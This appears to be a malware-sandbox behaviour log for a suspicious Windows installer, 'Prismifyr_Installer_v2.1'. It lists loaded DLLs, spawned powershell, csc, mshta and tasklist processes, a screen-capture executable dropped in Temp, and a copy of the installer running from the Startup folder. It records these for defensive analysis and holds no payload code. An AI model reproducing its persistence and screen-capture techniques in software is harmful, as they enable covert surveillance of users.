Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7b4c3a21-e2df-5efd-beb5-591edeb53a62Jump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exeStatic file information: File size 98394400 > 1048576
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: "ProgramDataBaseFileName": "$(IntDir)vc90b.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: "$(IntDir)$(ProjectName)\\vc80.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2475862062.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476010965.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476074048.0000000002E12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: # the .pdb by the precompiled header step for .cc and the compilation of source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: - Use '<(PRODUCT_DIR)/<(product_name).(exe|dll).pdb' if 'product_name' is source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: CLEANFILES="$CLEANFILES *.lib *.dll *.pdb *.exp" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: - Use '<(PRODUCT_DIR)/<(target_name).(exe|dll).pdb'. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2397315857.0000000005223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: config_name, self.ExpandSpecial, output + ".pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: # See comment at cc_command for why there's two .pdb files. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pdb = self.GetPDBName(config, expand_special, output_name + ".pdb") source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pdbpath_c = pdbpath + ".c.pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "ProgramDataBaseFileName": "$(IntDir)\\vc90b.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ** rbu_file.pDb!=0, then it is assumed to already be present on the source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpath_cc = pdbpath + ".cc.pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "ProgramDatabaseFile": "Flob.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
